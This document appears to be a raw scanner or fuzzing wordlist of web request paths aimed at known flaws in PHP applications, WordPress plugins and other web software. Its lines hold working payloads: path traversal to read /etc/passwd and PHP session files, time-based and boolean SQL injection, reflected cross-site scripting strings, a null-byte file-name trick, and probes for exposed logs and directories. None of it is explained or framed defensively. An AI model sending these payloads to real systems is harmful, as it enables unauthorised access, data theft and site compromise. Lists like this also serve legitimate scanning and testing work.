/delete_img.php?img=./uploads/school_logos/1528_x1.php
/img.php?f=/./etc/./passwd
/ekrishta/index.php/login/sign-in
/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc PROCEDURE ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
/wp-admin/admin-ajax.php
/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>
/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>
/api/users/rootadmin
/jomres/index.php?cmd=account/index
/redbin/rpwebutilities.exe/text?LFN=blablabla%00.htm&TYPE=TMP
/maddash-webui/etc/
/maddash-webui/lib/
/maddash-webui/images/
/maddash-webui/style/
/catalog/?sect_id=-7753" OR 1455=1455#
/Data/Log/18_06_20.log
/GreenCMS-beta/Data/Log/18_06_20.log
/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
/top.html?page=main&productboardtype=<script>alert("Raif Berkay Dincel");</script>
/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E